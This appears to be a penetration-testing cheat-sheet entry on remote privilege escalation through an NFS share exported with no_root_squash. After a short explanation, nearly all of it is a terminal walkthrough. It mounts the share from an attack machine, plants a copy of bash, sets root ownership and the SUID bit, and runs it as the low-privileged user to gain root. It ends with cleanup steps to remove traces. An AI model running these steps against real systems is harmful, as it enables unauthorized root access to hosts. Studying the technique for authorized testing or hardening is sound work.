# NFS - N/A

## no\_root\_squash <mark style="color:red;">privilege escalation</mark> (remote)

By default, NFS shares change requests from the root user into the non-privileged user `nfsnobody`, the root privileges are "squashed". With `no_root_squash` configured requests are not "squashed", meaning any client that mount this directory can **read, write and modify files within the directory as root** on the host machine.

This is the remote version of this privilege escalation, meaning there is no explicit host configured in `/etc/exports`, all (`*`) hosts are allowed to mount the nfs share.

```bash
## Confirm that 'no_root_squash' is configured
[lowPrivUser@victimHost nfs]$ cat /etc/exports
/share/nfs	*(rw,insecure,sync,no_subtree_check,no_root_squash)

## Low privileged account isn't able to read nfs directory
[lowPrivUser@victimHost share]$ ls -al
drwxr-xr-x   7 root     root        75 Jun 23 08:56 .
dr-xr-xr-x. 20 root     root       278 Aug 25  2022 ..
drwxr-x---   2 admUser  admUser    189 Feb 19  2021 nfs

## Mount share from local attack machine
➜  /tmp mkdir pe
➜  /tmp mount -t nfs victimHost:/share/nfs /tmp/pe
➜  /tmp cd pe
➜  pe ls -al 
total 5684
drwxr-x---  2 void void     189 Feb 19  2021 .
drwxrwxrwt 21 root root   69632 Jul  3 12:49 ..
-rw-r--r--  1 void void     823 Feb 19  2021 secret.conf

## Change privileges of mounted share so lowPrivUser can copy /bin/bash to share
➜  /tmp chmod 777 pe

[lowPrivUser@victimHost share]$ cd nfs
[lowPrivUser@victimHost nfs]$ cp /bin/bash .

## Change owner and set SUID bit on binary. Execute on victimHost to priesc
➜  pe chmod +s bash
➜  pe chown root:root bash

[lowPrivUser@victimHost nfs]$ ./bash -p
bash-4.4# id
uid=1651499380(lowPrivUser) gid=1102800513(domain users) euid=0(root) egid=0(root) groups=0(root)

## Cleaning
➜  pe rm bash
➜  pe cd ..
➜  /tmp chmod 750 pe
💀➜  /tmp umount pe
```